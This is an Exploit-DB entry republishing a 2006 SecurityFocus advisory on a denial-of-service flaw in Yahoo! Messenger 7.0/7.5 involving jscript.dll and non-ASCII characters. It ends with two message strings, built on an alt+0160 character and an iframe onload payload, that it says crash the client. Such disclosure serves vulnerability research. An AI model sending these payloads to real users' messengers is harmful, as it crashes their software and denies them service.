Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service

EDB-ID:

28099

Author:

Ivan Ivan

Type:

dos

Platform:

Windows

Published:

2006-06-23

source: http://www.securityfocus.com/bid/18622/info

Yahoo! Messenger is prone to a denial-of-service vulnerability. Successful exploitation will cause the application to crash, effectively denying service.

This issue affects version 7.5.0.814; other versions may also be vulnerable.

The following examples are sufficient to trigger this issue:

s:[space]msg[alt+0160]:---------------------------------------------iframe onload=$InlineAction()>:)

msg:---------------------------------------------iframe onload=$InlineAction()>:)